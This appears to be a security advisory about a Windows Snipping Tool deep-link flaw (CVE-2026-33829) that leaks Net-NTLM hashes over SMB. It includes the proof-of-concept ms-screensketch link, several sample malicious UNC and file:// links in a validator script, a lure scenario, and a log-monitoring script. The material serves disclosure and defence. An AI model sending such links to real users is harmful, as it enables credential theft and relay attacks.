Windows Snipping Tool Flaw Exposes Net-NTLM Hashes, Patch Released by Microsoft

Critical Vulnerability in Windows Snipping Tool Exposes NTLM Hashes

A recently disclosed vulnerability in Microsoft’s Snipping Tool, tracked as CVE-2026-33829, lets an attacker covertly capture a user’s Net-NTLM authentication response (commonly called the Net-NTLM hash) by luring them to a malicious web page. The flaw stems from the tool’s handling of its deep link registration: the `ms-screensketch` URI scheme passes an attacker-supplied file path through to the application without validation.

Understanding the Vulnerability

The Snipping Tool registers a deep link handler that accepts a `filePath` parameter. Because the value is not validated, an attacker can supply a Universal Naming Convention (UNC) path (`\\host\share\file`) that points at an attacker-controlled Server Message Block (SMB) server. Windows then opens an outbound SMB connection to that host and, as it does for any share, authenticates with the logged-on user’s credentials without prompting, so the user’s Net-NTLM challenge-response is delivered to the attacker’s server.

Proof-of-Concept Exploit

Security researchers at Black Arrow discovered and reported this vulnerability, coordinating disclosure with Microsoft before making it public. The proof-of-concept (PoC) exploit demonstrates the attack’s simplicity:

```
ms-screensketch:edit?&filePath=\\\file.png&isTemporary=false&saved=true&source=Toast
```

When a victim opens this link, the Snipping Tool launches and attempts to load the referenced file over SMB. During that connection Windows transparently sends the user’s Net-NTLM authentication response (a Net-NTLMv2 response on current default configurations) to the attacker’s server. Unlike an NT hash, that response cannot be replayed directly in a pass-the-hash attack, but it can be cracked offline against a wordlist to recover the password, or relayed in real time to internal services that do not require SMB signing or Extended Protection for Authentication.
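The check the handler is missing, as an added example (illustrative Python written for this page, not the Snipping Tool’s own code): a validator that parses an `ms-screensketch:` link and refuses any `filePath` that would make the handler open a remote resource. The first sample link mirrors the PoC above, with the host portion left exactly as the page shows it; the other samples, the function names, and the TEST-NET address 203.0.113.10 (a documentation address, not a real host) are constructed for illustration. The validator goes beyond the PoC’s literal form and also catches percent-encoded and forward-slash UNC paths, the `\\?\UNC\` prefix, and `file://` URLs, all of which Windows would resolve to a network location:

```python
"""
Illustrative validator for the filePath parameter of an ms-screensketch:
deep link. Added example, not Snipping Tool code: it shows the check whose
absence the advisory describes, i.e. refusing any path that would make the
handler open a remote (UNC / WebDAV / file://) resource and thereby trigger
SMB authentication. Constants, function names and sample links are assumptions.
"""
import re
from urllib.parse import parse_qs

# Only absolute local drive-letter paths are accepted, e.g. C:\Users\me\snip.png
_LOCAL_DRIVE_PATH = re.compile(r"^[A-Za-z]:\\")


def classify_path(raw: str) -> str:
    """Return one of: 'unc', 'file-url', 'local', 'relative', 'empty'."""
    p = raw.strip().replace("/", "\\")      # Windows accepts '/' as a separator
    if not p:
        return "empty"
    if p.lower().startswith("file:"):
        return "file-url"                   # file://host/share/x.png is remote too
    if p.startswith("\\\\"):
        # \\host\share, \\?\UNC\host\share, \\host@SSL@443\DavWWWRoot (WebDAV),
        # \\.\device ... conservatively also rejects the \\?\C:\ extended-length form
        return "unc"
    if _LOCAL_DRIVE_PATH.match(p):
        return "local"
    return "relative"                       # resolved against an unpredictable cwd; reject as well


def parse_deep_link(link: str) -> dict:
    """Split 'scheme:action?query' into parts; each query key maps to its first value.
    parse_qs percent-decodes, so %5C%5Chost%5Cshare becomes \\host\share before the check."""
    scheme, _, rest = link.partition(":")
    action, _, query = rest.partition("?")
    params = {k: v[0] for k, v in parse_qs(query).items()}
    return {"scheme": scheme.lower(), "action": action, "params": params}


def validate_deep_link(link: str) -> tuple:
    """Accept the link only if filePath (when present) is an absolute local path."""
    parsed = parse_deep_link(link)
    if parsed["scheme"] != "ms-screensketch":
        return False, "unexpected scheme"
    path = parsed["params"].get("filePath")
    if path is None:
        return True, "no filePath"
    kind = classify_path(path)
    if kind == "local":
        return True, "local path"
    return False, f"rejected filePath of kind '{kind}'"


# Constructed sample links; the first mirrors the advisory PoC (host elided as on the page).
SAMPLES = [
    "ms-screensketch:edit?&filePath=\\\\\\file.png&isTemporary=false&saved=true&source=Toast",
    "ms-screensketch:edit?filePath=%5C%5C203.0.113.10%5Cshare%5Cfile.png",  # percent-encoded UNC
    "ms-screensketch:edit?filePath=//203.0.113.10/share/file.png",          # forward-slash UNC
    "ms-screensketch:edit?filePath=\\\\?\\UNC\\203.0.113.10\\share\\file.png",
    "ms-screensketch:edit?filePath=file://203.0.113.10/share/file.png",
    "ms-screensketch:edit?filePath=C:\\Users\\alice\\Pictures\\snip.png",
    "ms-screensketch:edit?isTemporary=false",
]

if __name__ == "__main__":
    for s in SAMPLES:
        ok, why = validate_deep_link(s)
        print(f"{'ALLOW' if ok else 'BLOCK':5} {why:36} {s}")
```

Running it prints one ALLOW/BLOCK line per sample. The general lesson for any URI handler that takes a path: treat the query string as untrusted, percent-decode and normalise slashes first, and then allow only an explicit local form; checking for a leading `\\` alone misses the encoded, forward-slash and `file:` variants.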

Exploitation and Social Engineering

This vulnerability is particularly dangerous because it fits naturally into social engineering campaigns. Since the Snipping Tool opens as expected during exploitation, the attack looks legitimate to the user. For instance, an attacker could register a domain like `snip.example.com` and serve what appears to be an image link that actually delivers the malicious deep link. Most browsers show an “open this application?” prompt before launching a custom scheme, so the lure needs the user to confirm once; after that, the victim sees only the Snipping Tool open, while NTLM authentication to the attacker’s server happens in the background.

Patch and Mitigation

Microsoft addressed this vulnerability in its April 14, 2026, Patch Tuesday security update. The disclosure timeline is as follows:

– March 23, 2026: Vulnerability reported to Microsoft.
– April 14, 2026: Microsoft releases a security patch.
– April 14, 2026: Coordinated public advisory and PoC release.

Users and organizations running affected versions of the Windows Snipping Tool should apply the April 14, 2026, update immediately. Snipping Tool is distributed as a Microsoft Store app, so confirm the installed package version against the fixed version in Microsoft’s advisory rather than assuming Windows Update alone delivered it. Because the attack needs only an outbound SMB connection, network controls help regardless of patch status: block outbound TCP 445 and 139 to the Internet at the perimeter, and enforce the same block in the host firewall for laptops that leave the corporate network. Monitor for outbound SMB from workstations to external or unknown hosts; a denied connection is still worth triaging, since it shows the host attempted to authenticate outward. To limit what a captured response is worth, require SMB signing and Extended Protection for Authentication on internal servers (which blunts relay), and, where feasible, use the “Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers” policy to deny NTLM to hosts outside the domain.
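As an added example of the monitoring suggested above (code written for this page, not from the advisory): triage logic run over a few constructed firewall flow lines that flags TCP 445/139 to non-internal destinations and groups the results by source host. The log format, the internal address ranges, the field names and the sample addresses (RFC 1918 and TEST-NET documentation ranges, not real hosts) are all assumptions; adapt `parse_line()` to your firewall’s or Zeek `conn.log` fields.

```python
"""
Added example, not part of the advisory: flag outbound SMB connections
(TCP 445/139) from internal hosts to addresses outside the organisation.
Log format is a constructed generic one:
    <ts> <src_ip>:<sport> -> <dst_ip>:<dport> <proto> <action>
"""
import ipaddress
from typing import Optional

SMB_PORTS = {445, 139}

# Assumption: what this hypothetical organisation treats as "internal".
INTERNAL_NETS = [
    ipaddress.ip_network(n)
    for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")
]

# Constructed sample lines. The deny on the fourth line still matters: a blocked
# attempt is evidence that something on 10.1.4.37 tried to authenticate outward.
SAMPLE_LOG = """\
2026-04-15T09:12:01Z 10.1.4.22:51022 -> 10.1.1.5:445 tcp allow
2026-04-15T09:12:03Z 10.1.4.22:51030 -> 203.0.113.10:445 tcp allow
2026-04-15T09:12:03Z 10.1.4.22:51031 -> 203.0.113.10:443 tcp allow
2026-04-15T09:12:09Z 10.1.4.37:49211 -> 198.51.100.7:139 tcp deny
2026-04-15T09:12:10Z 10.1.4.22:51040 -> 203.0.113.10:445 tcp allow
this line is not a flow record
"""


def is_internal(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def parse_line(line: str) -> Optional[dict]:
    """Parse one flow line; return None for anything that does not fit the format.
    IPv4 only: the host:port split uses the last colon."""
    parts = line.split()
    if len(parts) != 6 or parts[2] != "->":
        return None
    try:
        src, sport = parts[1].rsplit(":", 1)
        dst, dport = parts[3].rsplit(":", 1)
        ipaddress.ip_address(src)   # raises ValueError on junk
        ipaddress.ip_address(dst)
        return {"ts": parts[0], "src": src, "dst": dst, "dport": int(dport),
                "proto": parts[4].lower(), "action": parts[5].lower()}
    except ValueError:
        return None


def find_smb_egress(lines):
    """Return flow records for TCP SMB traffic whose destination is outside INTERNAL_NETS."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec and rec["proto"] == "tcp" and rec["dport"] in SMB_PORTS and not is_internal(rec["dst"]):
            hits.append(rec)
    return hits


def summarize(hits) -> dict:
    """Group hits by source host: attempt count, external servers contacted, and how many were denied."""
    summary = {}
    for h in hits:
        entry = summary.setdefault(h["src"], {"count": 0, "dests": set(), "blocked": 0})
        entry["count"] += 1
        entry["dests"].add(h["dst"])
        if h["action"] == "deny":
            entry["blocked"] += 1
    return summary


if __name__ == "__main__":
    for src, info in summarize(find_smb_egress(SAMPLE_LOG.splitlines())).items():
        print(f"{src}: {info['count']} SMB attempt(s) to {sorted(info['dests'])}, "
              f"{info['blocked']} blocked")
```

Internal-to-internal SMB (the first line) is normal and is not reported; the filter is on the destination being outside the ranges you define, so tune `INTERNAL_NETS` to include any hosted file servers you legitimately reach over SMB, and pair a hit with process-level telemetry (which process opened the connection) to distinguish a Snipping Tool launch from, say, a VPN client.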

Broader Context of NTLM Vulnerabilities

This incident is part of a series of NTLM-related vulnerabilities affecting Windows systems. For example, in March 2025, a critical zero-day vulnerability allowed attackers to steal NTLM credentials by having users view a malicious file in Windows Explorer. This flaw affected all Windows operating systems from Windows 7 and Server 2008 R2 through Windows 11 v24H2 and Server 2025. Attackers could exploit this by having users open a shared folder, insert a USB drive containing the malicious file, or view a Downloads folder with such a file. Security researchers developed and released micropatches to mitigate the issue until Microsoft provided an official fix. ([cybersecuritynews.com](https://cybersecuritynews.com/new-windows-zero-day-vulnerability/?utm_source=openai))

In another instance, a vulnerability in Windows File Explorer, identified as CVE-2025-24071, enabled attackers to leak Net-NTLM hashes with no user interaction beyond extracting a compressed archive. This high-severity flaw was patched by Microsoft in March 2025. It abused Explorer’s automatic file processing: a specially crafted .library-ms file containing a malicious SMB path was enough to trigger the outbound authentication. ([cybersecuritynews.com](https://cybersecuritynews.com/microsoft-windows-file-explorer-vulnerability-let-attackers/?utm_source=openai))

Furthermore, in April 2025, cybercriminals actively exploited a critical vulnerability in Windows systems, identified as CVE-2025-24054, which leveraged NTLM hash disclosure through spoofing techniques. This vulnerability allowed attackers to leak NTLM hashes and potentially escalate privileges or move laterally within compromised networks. Despite the availability of a security patch, threat actors began exploiting this flaw within days of its release, targeting government and private institutions primarily in Poland and Romania. ([cybersecuritynews.com](https://cybersecuritynews.com/hackers-exploiting-ntlm-spoofing-vulnerability/?utm_source=openai))

Conclusion

The disclosure of CVE-2026-33829 underscores the ongoing challenges associated with NTLM vulnerabilities in Windows systems. Users and organizations must remain vigilant, promptly apply security updates, and implement robust monitoring to detect and prevent exploitation attempts.